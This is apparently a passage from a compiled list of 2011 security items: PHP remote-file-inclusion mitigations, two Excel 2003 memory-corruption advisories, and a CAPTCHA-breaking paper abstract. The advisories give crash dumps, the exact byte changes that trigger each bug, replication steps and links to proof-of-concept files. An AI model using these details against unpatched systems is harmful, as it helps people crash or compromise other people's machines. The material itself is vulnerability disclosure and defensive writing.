- Disable the setting allow_url_include in your php.ini to prevent remote file inclusion.
- Patch your __autoload() to only include from a local dir:

    include("./includes/" . $class_name . ".php");

- Install Suhosin to protect yourself from remote file inclusion, and more.

Of course, the best fix for this is to not install PHP 5.3.7 or PHP 5.3.8 until the PHP Project has fixed this bug and reverted to the old behavior.

The impact

The impact of this bug is relatively small. It takes quite some specific code to get your input passed all the way to is_a/the autoloader, but as the example showed, it's possible to do. I personally don't expect to see any exploits abusing this bug, but when it comes to the security of your website, better safe than sorry.

Also, for customers hosted at Byte, good news: of course we have the allow_url_include setting turned off by default.

Source: http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/
  24. Microsoft Excel Use after free/Memory corruption

    #######################################################################

                                 Luigi Auriemma

    Application:  Microsoft Excel
                  http://office.microsoft.com/en-us/excel/
                  http://office.microsoft.com/en-us/downloads/CD001022531.aspx
    Versions:     tested Office 2003 11.8335.8333 SP3
    Platforms:    Windows
    Bug:          use after free
    Exploitation: file
    Date:         03 Nov 2011 (found 24 Aug 2011)
    Author:       Luigi Auriemma
                  e-mail: aluigi@autistici.org
                  web:    aluigi.org

    #######################################################################

    1) Introduction
    2) Bug
    3) The Code
    4) Fix

    #######################################################################

    ===============
    1) Introduction
    ===============

    Excel 2003 is a spreadsheet program, part of the Office 2003 suite still
    supported by Microsoft.

    #######################################################################

    ======
    2) Bug
    ======

    Use-after-free probably located in the code that handles the vbscript
    macros:

    eax=00492d78 ebx=00000000 ecx=feeefeee edx=00185ff8 esi=004c72b8 edi=00492478
    eip=65058591 esp=00185fd0 ebp=0018601c iopl=0         nv up ei pl nz na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
    VBE6!DllVbeInit+0x40f6f:
    65058591 ff11            call    dword ptr [ecx]      ds:002b:feeefeee=????????
    0:000:x86> k
    ChildEBP RetAddr
    0018601c 6501c0dd VBE6!DllVbeInit+0x40f6f
    00186074 6505dee2 VBE6!DllVbeInit+0x4abb
    001860a8 6505e21c VBE6!DllVbeInit+0x468c0
    00186220 767cbc9c VBE6!DllVbeInit+0x46bfa
    00000000 00000000 ole32!StgIsStorageFile+0x764

    How to replicate:
    - open the proof-of-concept via web or manually
    - "An error occurred while loading 'Module1'. Do you want to continue
      loading the project?"
      select No, if you select Yes then the bug doesn't seem to be replicable
    - "Unexpected error (32790)"
      select OK
    - "Excel found unreadable content in ..."
      Yes or No is the same
    - now reopen the proof-of-concept and the bug will happen immediately

    The reopening of the same file seems necessary probably because the
    Office suite uses only one instance of its programs and performs a
    particular reallocation of the resources when a file gets reopened.

    Note that I have tested only the latest version of Office 2003 on
    Windows 7.

    The proof-of-concept is NOT optimized.

    Modified bytes:
      excel_1a.xls: 0006FCA4 AA 01
      excel_1b.xls: 0006FCB0 AD 40

    #######################################################################

    ===========
    3) The Code
    ===========

    http://aluigi.org/poc/excel_1.zip

    #######################################################################

    ======
    4) Fix
    ======

    No fix.

    #######################################################################


    #######################################################################

                                 Luigi Auriemma

    Application:  Microsoft Excel
                  http://office.microsoft.com/en-us/excel/
                  http://office.microsoft.com/en-us/downloads/CD001022531.aspx
    Versions:     tested Office 2003 11.8335.8333 SP3
    Platforms:    Windows
    Bug:          memory corruption
    Exploitation: file
    Date:         03 Nov 2011 (found 24 Aug 2011)
    Author:       Luigi Auriemma
                  e-mail: aluigi@autistici.org
                  web:    aluigi.org

    #######################################################################

    1) Introduction
    2) Bug
    3) The Code
    4) Fix

    #######################################################################

    ===============
    1) Introduction
    ===============

    Excel 2003 is a spreadsheet program, part of the Office 2003 suite still
    supported by Microsoft.

    #######################################################################

    ======
    2) Bug
    ======

    Memory corruption:

    eax=00000000 ebx=00690066 ecx=00000de9 edx=00000de8 esi=000202ad edi=00630020
    eip=30039ea2 esp=001896a8 ebp=02000814 iopl=0         nv up ei pl nz na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
    Excel!Ordinal41+0x39ea2:
    30039ea2 c7450800010000  mov     dword ptr [ebp+8],100h ss:002b:0200081c=00690066
    0:000:x86> k
    ChildEBP RetAddr
    001896b0 30278c45 Excel!Ordinal41+0x39ea2
    001896c8 30278c45 Excel!Ordinal41+0x278c45
    001896e0 3070c95a Excel!Ordinal41+0x278c45
    00189708 301fd1cb Excel!MdCallBack+0x27fe3e
    001899f8 010300dd Excel!Ordinal41+0x1fd1cb
    001899fc 00000000 0x10300dd

    Note that the exception can change and NO additional research has been
    performed.

    How to replicate:
    - open the proof-of-concept via web or manually
    - excel_2b.xls requires the clicking of "Open" when requested
    - now reopen the proof-of-concept and the bug will happen immediately

    The reopening of the same file seems necessary probably because the
    Office suite uses only one instance of its programs and performs a
    particular reallocation of the resources when a file gets reopened.

    Note that I have tested only the latest version of Office 2003 on
    Windows 7.

    The proof-of-concept is NOT optimized.

    Modified bytes:
      excel_2a.xls: 00067B5F 06 00
      excel_2b.xls: 00067B63 00 7F
      excel_2c.xls: 00000D70 00 04

    #######################################################################

    ===========
    3) The Code
    ===========

    http://aluigi.org/poc/excel_2.zip

    #######################################################################

    ======
    4) Fix
    ======

    No fix.

    #######################################################################

Sources:
- http://aluigi.altervista.org/adv/excel_1-adv.txt
- http://aluigi.altervista.org/adv/excel_2-adv.txt
  25. Text-based CAPTCHA Strengths and Weaknesses

Elie Bursztein, Stanford University, elie at cs.stanford.edu
Matthieu Martin, Stanford University, mamartin at stanford.edu
John C. Mitchell, jcm at cs.stanford.edu

The slides and paper are available for free from Text-based CAPTCHA Strengths and Weaknesses - Elie Bursztein. Follow Elie on Twitter: https://twitter.com/elie and Google+: http://ly.tl/g

ABSTRACT

We carry out a systematic study of existing visual CAPTCHAs based on distorted characters that are augmented with anti-segmentation techniques. Applying a systematic evaluation methodology to 15 current CAPTCHA schemes from popular web sites, we find that 13 are vulnerable to automated attacks. Based on this evaluation, we identify a series of recommendations for CAPTCHA designers and attackers, and possible future directions for producing more reliable human/computer distinguishers.

Download: http://cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf